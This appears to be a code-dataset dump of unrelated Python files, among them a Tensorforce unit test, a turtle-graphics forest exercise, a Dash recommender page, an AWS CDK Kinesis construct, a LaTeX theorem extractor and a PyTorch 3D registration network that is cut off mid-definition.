content stringlengths 5 1.05M |
|---|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import sys
from tensorforce import util
from tensorforce.agents import VPGAgent
from tensorforce.tests.agent_unittest import UnittestBase
class TestParameters(UnittestBase, unittest.TestCase):
agent = VPGAgent
def parameter_unittest(self, name, exploration):
states = dict(type='float', shape=(1,))
actions = dict(type='int', shape=(), num_values=3)
agent, environment = self.prepare(
name=name, states=states, actions=actions, exploration=exploration
)
agent.initialize()
states = environment.reset()
actions, exploration_output1 = agent.act(states=states, query='exploration')
self.assertIsInstance(exploration_output1, util.np_dtype(dtype='float'))
states, terminal, reward = environment.execute(actions=actions)
agent.observe(terminal=terminal, reward=reward)
if name != 'constant':
actions, exploration_output2 = agent.act(states=states, query='exploration')
self.assertNotEqual(exploration_output2, exploration_output1)
states, terminal, reward = environment.execute(actions=actions)
agent.observe(terminal=terminal, reward=reward)
exploration_input = 0.5
actions, exploration_output = agent.act(
states=states, query='exploration', exploration=exploration_input
)
self.assertEqual(exploration_output, exploration_input)
agent.close()
environment.close()
sys.stdout.flush()
self.assertTrue(expr=True)
def test_constant(self):
self.parameter_unittest(name='constant', exploration=0.1)
def test_random(self):
exploration = dict(type='random', distribution='uniform')
self.parameter_unittest(name='random', exploration=exploration)
def test_piecewise_constant(self):
exploration = dict(
type='piecewise_constant', dtype='float', unit='timesteps', boundaries=[0],
values=[0.1, 0.0]
)
self.parameter_unittest(name='piecewise-constant', exploration=exploration)
def test_decaying(self):
exploration = dict(
type='decaying', unit='timesteps', decay='exponential', initial_value=0.1,
decay_steps=1, decay_rate=0.5
)
self.parameter_unittest(name='decaying', exploration=exploration)
def test_ornstein_uhlenbeck(self):
exploration = dict(type='ornstein_uhlenbeck')
self.parameter_unittest(name='ornstein-uhlenbeck', exploration=exploration)
|
from django.contrib.admin.templatetags.admin_list import pagination
from django.template import Library
register = Library()
@register.inclusion_tag('admin/pagination_top.html')
def pagination_top(cl):
return pagination(cl) |
__author__ = 'Vinayak Marali'
__author__ = 'Pavan Prabhakar Bhat'
"""
CSCI-603: Lab 2 (week 2)
Section 03
Author: Pavan Prbahakar Bhat (pxb8715@rit.edu)
Vinayak Marali (vkm7895@rit.edu)
This is a program that draws a forest with trees and a house.
"""
# Imports required by the program
import turtle
import random
import math
# global constants
UNIT = 50
# to store the height of trees
treeHt=[]
def init():
"""
Inititializes the window for drawing. (1200,800) is the window setup
:pre: (relative) pos(0,0), heading (east), up
:post: relative position, heading (east), up
:param: None
:return: None
"""
turtle.setup(1200, 800)
turtle.penup()
turtle.left(180)
turtle.forward(10 * UNIT)
turtle.left(90)
turtle.forward(4 * UNIT)
turtle.left(90)
def drawTrunk(size):
"""
Draws the trunl of the trees on the screen
:pre: (relative) position, heading (east), down
:post: (relative) position, heading (east), up
:param size: length of the tree trunk to be drawn
:return: None
"""
turtle.pendown()
turtle.left(90)
turtle.forward(size)
turtle.penup()
turtle.right(180)
turtle.forward(size)
turtle.left(90)
def drawSpace():
"""
Draws a space between the trees or between a house and a tree.
:pre: (relative) position, heading (east), up
:post: (relative) position, heading (east), up
:param: None
:return: None
"""
turtle.penup()
turtle.forward(2 * UNIT)
def drawTree(treeNo, isHouse, houseNo):
"""
Draws the tree on the screen
:pre: (relative) position, heading (east), up
:post: (relative) position, heading (east), up
:param treeNo: constant required to build the walls and roof of the house
:param isHouse: a boolean value which determines whether the house is required or not by the user
:param houseNo: a value required to determine the position of the house
:return: wood required to build the tree
"""
# counts the number of trees that are printed
count = 0
flag = 0
while treeNo > 0:
# Required to generate a random type of tree
randomtree = random.randint(1, 3)
if randomtree == 1:
trunkheight = UNIT * random.randint(1, 2)
treeHt.append(trunkheight)
drawTrunk(trunkheight)
turtle.left(90)
turtle.forward(trunkheight)
turtle.left(90)
turtle.penup()
turtle.forward(0.5 * UNIT)
turtle.pendown()
turtle.right(120)
turtle.forward(UNIT)
turtle.right(120)
turtle.forward(UNIT)
turtle.right(120)
turtle.penup()
turtle.forward(0.5 * UNIT)
turtle.penup()
turtle.left(90)
turtle.forward(trunkheight)
turtle.left(90)
drawSpace()
count = count + 1
elif randomtree == 2:
trunkheight = UNIT * random.randint(1, 3)
treeHt.append(trunkheight)
drawTrunk(trunkheight)
turtle.left(90)
turtle.forward(trunkheight)
turtle.right(90)
turtle.pendown()
turtle.circle(0.5 * UNIT)
turtle.penup()
turtle.right(90)
turtle.forward(trunkheight)
turtle.left(90)
drawSpace()
count = count + 1
elif randomtree == 3:
trunkheight = UNIT * random.randint(1, 4)
treeHt.append(trunkheight)
drawTrunk(trunkheight)
turtle.pendown()
turtle.left(90)
turtle.forward(trunkheight)
turtle.left(90)
turtle.forward(0.5 * UNIT)
turtle.right(120)
turtle.forward(UNIT)
turtle.right(120)
turtle.forward(UNIT)
turtle.right(120)
turtle.forward(0.5 * UNIT)
turtle.penup()
turtle.left(90)
turtle.forward(trunkheight)
turtle.left(90)
drawSpace()
count = count + 1
if isHouse == 'y' and count == houseNo and flag == 0:
flag = 1
hlumber = drawHouse(50)
drawSpace()
treeNo = treeNo - 1
return sum(treeHt)
def drawHouse(unit):
"""
Draws the house on the screen
:pre: (relative) pos (0,0), heading (east), down
:post: (relative) pos (0,0), heading (east), up
:param unit: constant required to build the walls and roof of the house
:return: wood required to build the house
"""
turtle.pendown()
turtle.left(90)
turtle.forward(2 * unit)
turtle.right(45)
turtle.forward(unit * math.sqrt(2))
turtle.right(90)
turtle.forward(unit * math.sqrt(2))
turtle.right(45)
turtle.forward(2 * unit)
turtle.left(90)
turtle.penup()
return 2 * unit + unit * math.sqrt(2) + unit * math.sqrt(2) + 2 * unit
def drawstar(hStar):
"""
Draws the star on the screen
:pre: (relative) pos (0,0), heading (east), down
:post: (relative) pos (0,0), heading (east), down
:param hStar: height of star
:return: None
"""
turtle.left(90)
turtle.forward(hStar)
turtle.pendown()
turtle.forward(20)
turtle.right(180)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.right(180)
turtle.forward(20)
turtle.right(180)
turtle.forward(10)
turtle.left(45)
turtle.forward(10)
turtle.right(180)
turtle.forward(20)
turtle.right(180)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.right(180)
turtle.forward(20)
def drawSun():
"""
Draws the sun on the screen
:pre: (relative) position, heading (east), down
:post: (relative) position, heading (east), down
:param: None
:return: None
"""
turtle.pendown()
turtle.circle(15)
def main():
"""
The main function.
:pre: (relative) pos (0,0), heading (east)
:post: (relative) pos (0,0), heading (east)
:return: None
"""
# the lumber required by the house
hlumber = 0
turtle.bgcolor('black')
turtle.pencolor('white')
init()
# Number of trees required by the user
treeNo = int(input('Enter the number of trees '))
isHouse = input('Is there a house in the forest (y/n)? ')
# generates the house at random locations
if isHouse == 'y':
if treeNo >=2 :
houseNo = random.randint(1, treeNo-1)
else:
print('There have to be atleast 2 trees for the house to be printed')
houseNo = 0
tlumber = drawTree(treeNo, isHouse, houseNo)
hlumber = 2 * 50 + 50 * math.sqrt(2) + 50 * math.sqrt(2) + 2 * 50
else:
tlumber = drawTree(treeNo, isHouse, 0)
# draws the star 10 pixels higher than the highest tree
hStar = max(treeHt) + UNIT + 10
drawstar(hStar)
# Total lumber from the trees and the house
lumber = hlumber + tlumber
wallht = lumber/(2 + math.sqrt(2))
input('Night is done, press enter for day')
turtle.reset()
init()
turtle.bgcolor('white')
turtle.pencolor('black')
input('We have ' + str(lumber) + ' units of lumber for the building.')
input('We will build a house with walls ' + str(wallht) + ' tall.')
drawHouse(wallht/2)
drawSpace()
turtle.left(90)
turtle.forward(wallht * 2)
drawSun()
input('Day is done, house is built, press enter to quit')
# Calling the main function
if __name__ == '__main__':
main()
|
"""
This displays the user-based filtering page
"""
from ast import literal_eval
from collections import defaultdict
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import numpy as np
from app import APP
import global_record
import grab_list
import display_final_movie
COLORS = {
'background': '#111111',
'text': '#000080'
}
NUM_FINAL_RECOMMEND = 10
COP = defaultdict(list)
df = pd.read_csv('movies-dataset/source/collaborative_result.csv',
header=None, index_col=0, converters={1: literal_eval})
for row in df.iterrows():
# print([item for item in row[1][0]])
tmp_list = list(row[1])
COP[int(row[0])] = [item[0] for item in tmp_list[0]]
obs = grab_list.read_csv()
id_set = obs.id_set
id_title_set = obs.id_title_set
user_val = []
user_val.extend([{'label': str(i), 'value': i} for i in np.arange(1, 467, 1)])
def main():
"""
:return: a html div with all content to be displayed for the user-based filtering,
including, a div with drop down boxes, find user button, and movies with their info
"""
movie_div = display_final_movie.add_final_movies(zip(range(NUM_FINAL_RECOMMEND),
global_record.INITIAL_MOVIE_ID_LIST[10:(10 + NUM_FINAL_RECOMMEND)]))
search_bar = html.Div(
children=[
html.Div(children='Please type a user ID',
style={'text-align': 'center',
'font-size': '16px',
'margin-bottom': '20px'}),
html.Div(dcc.Input(
id='user_id_dropdown'.format(),
type='number',
placeholder="Please enter a user id",
style={'font-size': '13px',
'width': '100%'}
))
]
)
search_button_div = html.Div(html.Button(id='user_id_button',
children='Find User',
style={'font-size': '13px'}),
style={'margin-top': '50px',
'margin-bottom': '20px',
'width': '40%',
'margin-left': '30%',
'text-align': 'center'})
app_recommender_tab = html.Div(children=[])
app_recommender_tab.children.append(html.Div(html.H1('User-based Filtering'),
className='wrap'))
app_recommender_tab.children.append(html.Div(search_bar, style={'margin-top': '15px'}))
app_recommender_tab.children.append(search_button_div)
app_recommender_tab.children.append(html.Div(id='recommend_main_div', children=movie_div))
return app_recommender_tab
def call_back_recom():
"""
A call back function for the find user button in the html div.
:return: a updated html div with after the filter button is clicked
"""
list_state = [State('user_id_dropdown', 'value')]
@APP.callback(
Output('recommend_main_div', 'children'),
[Input('user_id_button', 'n_clicks')],
list_state)
def update_multi_output(n_clicks, *input_value):
ctx = dash.callback_context
if not ctx.triggered:
user_click = 'No clicks yet'
else:
user_click = ctx.triggered[0]['prop_id'].split('.')[0]
if n_clicks is not None and n_clicks > 0:
list_filter = list(input_value)
user_id = int(list_filter[0])
print(user_id)
list_next_movie_id = []
movie_names = COP[user_id]
# movie_names = COP.user_recommendation_dic[user_id]
for mn in movie_names:
print(mn)
if mn in id_title_set:
#print(id_title_set[mn])
list_next_movie_id.append(int(id_title_set[mn]))
print(list_next_movie_id)
ls = []
for ids in list_next_movie_id:
if ids in id_set:
ls.append(ids)
list_next_movie_id = ls
num_movie_rate = len(list_next_movie_id)
print(list_next_movie_id)
result = display_final_movie.add_final_movies(zip(range(num_movie_rate), list_next_movie_id))
return result
else:
raise PreventUpdate
if __name__ == '__main__':
main()
|
import streamlit as st
from src.database import Database
from src.utils import setup_logger, excel_download_link
logger = setup_logger()
def home_page():
logger.info({"message": "Loading home page."})
st.title("Excel SQL Runner")
st.write("Here you can run SQLs on your excel files.")
st.write("You can use `Add table` in sidebar menu to upload your excel files to temporary database.")
# Create Database object
db = Database(file_name=st.session_state.db_name)
with st.form(key="home_form"):
query = st.text_area("SQL-statement", value="SELECT * FROM table",
height=300,
help="SQL-statement based on SQLite syntax.")
if st.form_submit_button(label='Run query'):
logger.info({"message": "Running query"})
df_query = db.query(query)
else:
df_query = None
if df_query is not None:
st.markdown(excel_download_link(df_query), unsafe_allow_html=True)
if len(df_query) > 1000:
st.write(df_query.head(1000))
st.write("Displaying first 1000 rows.")
else:
st.write(df_query)
st.write("Displaying {} rows.".format(len(df_query)))
logger.info({"message": "Home page loaded."}) |
#!/usr/bin/env python
#-*- coding=utf-8 -*-
#
# Copyright 2012 Jike Inc. All Rights Reserved.
# Author: liwei@jike.com
try:
s = 'abc'
s[0] = 'b'
except TypeError:
print 'str is not mutable'
try:
t = (1, 2, 3)
t[0] = 2
except TypeError:
print 'tuple is not mutable'
class A(object):
def __init__(self):
self.a = 'a'
def __str__(self):
return self.a
def modify(obj):
obj.a = 'b'
def rebind(obj):
obj = A()
obj.a = 'c'
obj = A()
print 'before modify %s' % obj
modify(obj)
print 'after modify %s' % obj
rebind(obj)
print 'after rebind %s' % obj
|
""" Kinesis Stream and Firehose Construct """
import os
from aws_cdk import (
core,
aws_iam,
aws_kinesis,
aws_kinesisfirehose,
aws_logs
)
from accounts.accounts import fetch_account_central
ACCOUNT_NUMBER = os.environ.get('CDK_DEPLOY_ACCOUNT')
CENTRAL_ACCOUNT_NUMBER = fetch_account_central(ACCOUNT_NUMBER)
class KinesisConstruct(core.Construct):
""" Kinesis Stream and Firehose Construct """
bucket_arn: str
prefix: str
errorOutputPrefix: str
def __init__(
self,
scope: core.Construct,
id: str, # pylint: disable=redefined-builtin
bucket_arn: str,
prefix: str,
errorOutputPrefix: str,
database: str,
table: str,
**_kwargs
):
super().__init__(scope, id)
self.bucket_arn = bucket_arn
self.prefix = prefix
self.errorOutputPrefix = errorOutputPrefix
self.database = database
self.table = table
#Kinesis Stream
self.kinesis_stream = aws_kinesis.Stream(
self,
id='stream'
)
log_group = aws_logs.LogGroup(
self,
id="FirehoseLogGroup",
removal_policy=core.RemovalPolicy.DESTROY
)
log_stream = aws_logs.LogStream(
self,
id="FirehoseLogStream",
log_group=log_group,
removal_policy=core.RemovalPolicy.DESTROY
)
role_firehose_policy = aws_iam.PolicyDocument(statements=[
aws_iam.PolicyStatement(
actions=[
"s3:AbortMultipartUpload",
"s3:GetBucketLocation",
"s3:GetObject",
"s3:ListBucket",
"s3:ListBucketMultipartUploads",
"s3:PutObject",
"s3:PutObjectAcl",
"kinesis:DescribeStream",
"glue:Get*",
"glue:Put*",
"glue:Update*",
"logs:PutLogEvents"
],
resources=[
self.bucket_arn,
"{}/*".format(self.bucket_arn),
'arn:aws:kinesis:*:*:stream/data-gov*',
f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:catalog',
f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:database/*',
f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:table/*',
f"arn:aws:logs:*:{core.Aws.ACCOUNT_ID}:log-group:{log_group.log_group_name}:log-stream:{log_stream.log_stream_name}"
]
),
aws_iam.PolicyStatement(
effect=aws_iam.Effect.ALLOW,
actions=[
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
resources=[f"arn:aws:kms:*:{CENTRAL_ACCOUNT_NUMBER}:key/*"]
)
])
role_firehose = aws_iam.Role(
self, "FirehoseRole",
assumed_by=aws_iam.ServicePrincipal("firehose.amazonaws.com"),
inline_policies={
"FirehosePolicy": role_firehose_policy
}
)
self.kinesis_stream.grant_read(role_firehose)
#Kinesis Firehose
aws_kinesisfirehose.CfnDeliveryStream(
self,
id="DeliveryFirhose",
delivery_stream_type="KinesisStreamAsSource",
kinesis_stream_source_configuration={
"kinesisStreamArn": self.kinesis_stream.stream_arn,
"roleArn": role_firehose.role_arn,
},
extended_s3_destination_configuration={
"bucketArn": self.bucket_arn,
"prefix": self.prefix,
"errorOutputPrefix": self.errorOutputPrefix,
"roleArn": role_firehose.role_arn,
"compressionFormat": "UNCOMPRESSED",
"bufferingHints": {
"intervalInSeconds": 60,
"sizeInMBs": 64,
},
"dataFormatConversionConfiguration": {
"enabled" : True,
"inputFormatConfiguration" : {
"deserializer": {
"openXJsonSerDe": {
}
}
},
"outputFormatConfiguration" : {
"serializer" : {
"parquetSerDe" : {}
}
},
"schemaConfiguration" : {
"catalogId": core.Aws.ACCOUNT_ID,
"databaseName": self.database,
"tableName": self.table,
"roleArn": role_firehose.role_arn,
"region": core.Aws.REGION,
"versionId": "LATEST"
}
},
"cloudWatchLoggingOptions": {
"enabled" : True,
"logGroupName" : log_group.log_group_name,
"logStreamName" : log_stream.log_stream_name
}
}
) |
import os
import csv
import random
from sys import breakpointhook
words = []
position = 0
word_size = 9
#word_list="words_alpha.txt"
word_list="norvig_100000.txt"
def load_words():
words.clear()
if os.access(word_list,os.F_OK):
f = open(word_list)
for row in csv.reader(f, delimiter='\t'):
if len(row[position]) == word_size:
words.append(row)
f.close()
def show_words():
index = 1
for word in words:
show_word(word, index)
index = index + 1
print()
def show_word(word, index):
outputstr = "{0:>3} {1:<200} "
print(outputstr.format(index, word[position]))
def show_quiz():
r_index = int(random.random()*len(words))
answer = str(words[r_index][0])
print("Conundrum is : " + ''.join(random.sample(answer, word_size)))
print("Enter your answer ")
print("Enter your answer ")
word = input("Answer "+" : ")
print(word)
if(word == answer):
print("answer is right ", answer)
else:
print("answer is wrong ", answer)
def menu_choice():
""" Find out what the user wants to do next. """
print("Choose one of the following options?")
print(" s) Show")
print(" n) Set word size")
print(" p) Play Conundrum")
print(" q) Quit")
choice = input("Choice: ")
if choice.lower() in ['s','q','p','n']:
return choice.lower()
else:
print(choice +"?")
print("Invalid option")
return None
def main_loop():
global word_size
load_words()
while True:
choice = menu_choice()
if choice == None:
continue
if choice == 'q':
print( "Exiting...")
break # jump out of while loop
elif choice == 's':
show_words()
elif choice == 'p':
show_quiz()
elif choice == 'n':
print("Enter word length ")
word_size = int(input())
load_words()
else:
print("Invalid choice.")
# The following makes this program start running at main_loop()
# when executed as a stand-alone program.
if __name__ == '__main__':
main_loop() |
'''Testing library for the applequest web app'''
|
import olympe
import os
from olympe.messages.ardrone3.PilotingSettingsState import MaxTiltChanged
DRONE_IP = os.environ.get("DRONE_IP", "10.202.0.1")
def test_maxtiltget():
drone = olympe.Drone(DRONE_IP)
drone.connect()
print("Drone MaxTilt = ", drone.get_state(MaxTiltChanged)["current"])
drone.disconnect()
if __name__ == "__main__":
test_maxtiltget()
|
class Solution:
def numSteps(self, s: str) -> int:
|
#eg1
x = 4
y = 4
print(x==y)
#eg2
x = 5
y = '5'
print(x==y)
#eg3
x = 'Python'
y = 'python'
print(x==y)
#eg4
x = 'Python'
y = 'python'
print(x.lower())
print(x.lower()==y)
#eg5
print({5,6,7} == {7,6,5})
|
#!/usr/bin/env python
from operator import *
class MyObj(object):
def __init__(self,val):
super(MyObj,self).__init__()
self.val = val
def __str__(self):
return"MyObj(%s)"%self.val
def __lt__(self,other):
print'Testing %s < %s'%(self,other)
return self.val < other.val
def __add__(self,other):
print'Adding %s + %s'%(self,other)
return MyObj(self.val + other.val)
a = MyObj(1)
b = MyObj(2)
print'Comparision:'
print lt(a,b)
print'\nArithmetic:'
print add(a,b)
|
import click
import csv
from enum import Enum
import re
EXTRACTABLE_TYPES = {
"theorem": ["thm", "theorem"],
"definition": ["def", "definition"],
"corollary": ["cor", "corollary"],
"lemma": ["lem", "lemm", "lemma"],
}
class RegexParts(Enum):
ExtraCharactersBeforeBeginTag = 0,
MainBeginTag = 1,
ExtraCharactersAfterBeginTag = 2,
ExtraOptionsWithBrackets = 3,
ExtraOptionsWithoutBrackets = 4,
LabelWithoutBrackets = 5,
MainContent = 6,
ExtraCharactersBeforeEndTag = 7,
MainEndTag = 8,
ExtraCharactersAfterEndTag = 9,
class RegexBuilder:
def __init__(self, type):
self.type = type
# Build the regex from the individual components
self.regex = self.build_regex_options()
self.regex += self.build_tag_matcher('begin', extra_options_brackets=True)
self.regex += self.build_content_matcher()
self.regex += self.build_tag_matcher('end')
@staticmethod
def build_regex_options():
# Make regex case insensitive, non-greedy
return '(?is)'
@staticmethod
def build_content_matcher():
return '\s*(.*?)?\s*'
def build_tag_matcher(self, tagname, extra_options_brackets=False):
tag_matcher = '\\\\'
tag_matcher += tagname
tag_matcher += '\{'
tag_matcher += self.build_tagname_matcher()
tag_matcher += '\}'
if extra_options_brackets:
tag_matcher += '(\[([^\]]*)\]|\s*\\\\label\{([^\}]*)\})?'
return tag_matcher
def build_tagname_matcher(self):
tag_names = '('
for i, tag_name in enumerate(EXTRACTABLE_TYPES[self.type]):
tag_names += tag_name
if i != len(EXTRACTABLE_TYPES[self.type]) - 1:
tag_names += '|'
tag_names += ')'
extra_characters_matcher = '([a-z_]*)'
return '%s%s%s' % (extra_characters_matcher, tag_names, extra_characters_matcher)
def get_regex(self):
return self.regex
class MatchedOutputProcessor:
def __init__(self, type):
self.type = type
def get_csv_array(self, match):
groups = match.groups()
if groups[RegexParts.ExtraOptionsWithoutBrackets.value[0]]:
name = self.get_name(groups[RegexParts.ExtraOptionsWithoutBrackets.value[0]])
else:
name = self.get_name(groups[RegexParts.LabelWithoutBrackets.value[0]])
content = groups[RegexParts.MainContent.value[0]]
if content is None:
return None
return [self.type, name, content]
@staticmethod
def get_name(extra_options):
if extra_options is None or not len(extra_options):
return ''
if ':' in extra_options:
# Name is given by a label, which is usually of the form cor:bla, so filter bla out
# Either this is already the full name, OR this contains 'name='
parts = extra_options.split(':')
if len(parts) > 2:
return ':'.join(parts[1:])
else:
return parts[0] if len(parts) == 1 else parts[1]
else:
# Either this is already the full name, OR this contains 'name='
match = re.search('name=([^,]+)?', extra_options)
if match:
return match.groups()[0]
else:
return extra_options
@click.command()
@click.argument('input', type=click.File('r'))
@click.argument('output', type=click.File('w'))
def cli(input, output):
"""This script processes a TEX file (input), and extract any \begin-\end pairs of tags that are specified in
EXTRACTABLE_TYPES. Those are then written to a csv file (output).
"""
tex_content = input.read()
csv_writer = csv.writer(output, delimiter=';')
for type in EXTRACTABLE_TYPES:
regex = RegexBuilder(type).get_regex()
type_count = 0
output_processor = MatchedOutputProcessor(type)
pattern = re.compile(regex)
for match in re.finditer(pattern, tex_content):
row = output_processor.get_csv_array(match)
if row is not None:
csv_writer.writerow(row)
type_count += 1
print("Found %d valid elements of type %s." % (type_count, type)) |
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools as it
import floppyforms as floppy
class TriStateCheckboxSelectMultiple(floppy.widgets.Input):
"""Renders tri-state multi-selectable checkbox.
.. note:: Subclassed from ``CheckboxSelectMultiple`` and not from
``SelectMultiple`` only to make
``horizon.templatetags.form_helpers.is_checkbox`` able to recognize
this widget.
Otherwise template ``horizon/common/_form_field.html`` would render
this widget slightly incorrectly.
"""
template_name = 'common/tri_state_checkbox/base.html'
VALUES_MAP = {
'True': True,
'False': False,
'None': None
}
def get_context(self, name, value, attrs=None, choices=()):
"""Renders html and JavaScript.
:param value: Dictionary of form
Choice => Value (Checked|Uncheckec|Indeterminate)
:type value: dict
"""
context = super(TriStateCheckboxSelectMultiple, self).get_context(
name, value, attrs
)
choices = dict(it.chain(self.choices, choices))
if value is None:
value = dict.fromkeys(choices, False)
else:
value = dict(dict.fromkeys(choices, False).items() +
value.items())
context['values'] = [
(choice, label, value[choice])
for choice, label in choices.iteritems()
]
return context
@classmethod
def parse_value(cls, value):
"""Converts encoded string with value to Python values."""
choice, value = value.split('=')
value = cls.VALUES_MAP[value]
return choice, value
def value_from_datadict(self, data, files, name):
"""Expects values in ``"key=False/True/None"`` form."""
try:
values = data.getlist(name)
except AttributeError:
if name in data:
values = [data[name]]
else:
values = []
return dict(map(self.parse_value, values))
class ExtraContextWidgetMixin(object):
def __init__(self, *args, **kwargs):
super(ExtraContextWidgetMixin, self).__init__(*args, **kwargs)
self.extra_context = kwargs.pop('extra_context', {})
def get_context(self, *args, **kwargs):
context = super(ExtraContextWidgetMixin, self).get_context(
*args, **kwargs
)
context.update(self.extra_context)
return context
|
import torch
from torch import nn
import torch.nn.functional as F
def relu():
return nn.ReLU(inplace=True)
def conv(in_channels, out_channels, kernel_size=(3,3,3), stride=(1,1,1), padding = 1, nonlinearity = relu):
conv_layer = nn.Conv3d(in_channels = in_channels, out_channels= out_channels, kernel_size = kernel_size, stride = stride, padding = padding, bias = False)
nll_layer = nonlinearity()
bn_layer = nn.BatchNorm3d(out_channels)
layers = [conv_layer, bn_layer, nll_layer]
return nn.Sequential(*layers)
def deconv(in_channels, out_channels, kernel_size=(3,3,3), stride=(1,1,1), padding = 1, nonlinearity = relu):
conv_layer = nn.ConvTranspose3d(in_channels = in_channels, out_channels= out_channels, kernel_size = kernel_size, stride = stride, padding = padding, output_padding = 1, bias = False)
nll_layer = nonlinearity()
bn_layer = nn.BatchNorm3d(out_channels)
layers = [conv_layer, bn_layer, nll_layer]
return nn.Sequential(*layers)
def conv_blocks_2(in_channels, out_channels, strides=(1,1,1)):
conv1 = conv(in_channels, out_channels, stride = strides)
conv2 = conv(out_channels, out_channels, stride=(1,1,1))
layers = [conv1, conv2]
return nn.Sequential(*layers)
def conv_blocks_3(in_channels, out_channels, strides=(1,1,1)):
conv1 = conv(in_channels, out_channels, stride = strides)
conv2 = conv(out_channels, out_channels, stride=(1,1,1))
conv3 = conv(out_channels, out_channels, stride=(1,1,1))
layers = [conv1, conv2, conv3]
return nn.Sequential(*layers)
def fullyconnect(in_features, out_features, out_channels, nonlinearity = relu):
fc_layer = nn.Linear(in_features = in_features, out_features= out_features, bias = False)
nll_layer = nonlinearity()
bn_layer = nn.BatchNorm1d(out_channels)
layers = [fc_layer, bn_layer, nll_layer]
return nn.Sequential(*layers)
def conv_2D(in_channels, out_channels, kernel_size=3, stride=1, padding = 1, nonlinearity = relu):
conv_layer = nn.Conv2d(in_channels = in_channels, out_channels= out_channels, kernel_size = kernel_size, stride = stride, padding = padding, bias = False)
nll_layer = nonlinearity()
bn_layer = nn.BatchNorm2d(out_channels)
layers = [conv_layer, bn_layer, nll_layer]
return nn.Sequential(*layers)
def deconv_2D(in_channels, out_channels, kernel_size=3, stride=1, padding = 1, nonlinearity = relu):
conv_layer = nn.ConvTranspose2d(in_channels = in_channels, out_channels= out_channels, kernel_size = kernel_size, stride = stride, padding = padding, output_padding = 1, bias = False)
nll_layer = nonlinearity()
bn_layer = nn.BatchNorm2d(out_channels)
layers = [conv_layer, bn_layer, nll_layer]
return nn.Sequential(*layers)
def conv_blocks_2_2D(in_channels, out_channels, strides=1):
conv1 = conv_2D(in_channels, out_channels, stride = strides)
conv2 = conv_2D(out_channels, out_channels, stride=1)
layers = [conv1, conv2]
return nn.Sequential(*layers)
def conv_blocks_3_2D(in_channels, out_channels, strides=1):
conv1 = conv_2D(in_channels, out_channels, stride = strides)
conv2 = conv_2D(out_channels, out_channels, stride=1)
conv3 = conv_2D(out_channels, out_channels, stride=1)
layers = [conv1, conv2, conv3]
return nn.Sequential(*layers)
def generate_grid(x, offset):
x_shape = x.size()
grid_d, grid_w, grid_h = torch.meshgrid([torch.linspace(-1, 1, x_shape[2]), torch.linspace(-1, 1, x_shape[3]), torch.linspace(-1, 1, x_shape[4])]) # (h, w, h)
grid_d = grid_d.cuda().float()
grid_w = grid_w.cuda().float()
grid_h = grid_h.cuda().float()
grid_d = nn.Parameter(grid_d, requires_grad=False)
grid_w = nn.Parameter(grid_w, requires_grad=False)
grid_h = nn.Parameter(grid_h, requires_grad=False)
offset_h, offset_w, offset_d = torch.split(offset, 1, 1)
offset_d = offset_d.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
offset_w = offset_w.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
offset_h = offset_h.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
offset_d = grid_d + offset_d
offset_w = grid_w + offset_w
offset_h = grid_h + offset_h
offsets = torch.stack((offset_h, offset_w, offset_d), 4) # should have the same order as offset
return offsets
def transform(seg_source, loc, mode='bilinear'):
grid = generate_grid(seg_source, loc)
# seg_source: NCDHW
# grid: NDHW3
# when input is 5D the mode='bilinear' is used as trilinear
out = F.grid_sample(seg_source, grid, mode=mode, align_corners=True)
return out
class MotionMesh_25d(nn.Module):
"""Deformable registration network with input from image space """
def __init__(self, n_ch=64):
super(MotionMesh_25d, self).__init__()
self.conv_blocks_2D = [conv_blocks_2_2D(n_ch, 64), conv_blocks_2_2D(64, 128, 2), conv_blocks_3_2D(128, 256, 2),
conv_blocks_3_2D(256, 512, 2), conv_blocks_3_2D(512, 512, 2)]
self.conv_list_2D = []
for in_filters in [128, 256, 512, 1024, 1024]:
self.conv_list_2D += [conv_2D(in_filters, 64)]
self.conv_blocks_2D = nn.Sequential(*self.conv_blocks_2D)
self.conv_list_2D = nn.Sequential(*self.conv_list_2D)
self.conv6 = conv_2D(64 * 15, 64, 1, 1, 0)
self.conv7 = conv_2D(64, 64, 1, 1, 0)
self.conv3d9 = conv(1, 32, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d10 = conv(32, 64, kernel_size=(3, 3, 3), stride=(2, 2, 2))
self.conv3d10_1 = conv(64, 64, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d11 = conv(64, 128, kernel_size=(3, 3, 3), stride=(2, 2, 2))
self.conv3d11_1 = conv(128, 128, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d12 = conv(128, 256, kernel_size=(3, 3, 3), stride=(2, 2, 2))
self.conv3d12_1 = conv(256, 256, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d13 = deconv(256, 128, kernel_size=(3, 3, 3), stride=(2, 2, 2))
